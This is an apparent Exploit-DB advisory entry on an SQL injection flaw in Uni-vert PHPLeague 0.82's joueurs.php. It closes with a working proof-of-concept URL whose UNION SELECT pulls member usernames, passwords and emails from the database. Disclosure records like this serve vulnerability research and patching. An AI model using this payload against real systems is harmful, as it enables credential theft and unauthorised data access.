Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection

EDB-ID:

28492




Platform:

PHP

Date:

2006-09-06


source: https://www.securityfocus.com/bid/19880/info

Uni-vert PhpLeague is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

This issue may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Versions 0.82b and 0.82 are vulnerable; other versions may also be affected.

http://www.example.com/[path]/consult/joueurs.php?id_joueur=-1'%20UNION%20SELECT%20pseudo,2,3,mot_de_passe,5,mail,7,8,9%20%20FROM%20phpl_membres%20WHERE%20id%20='1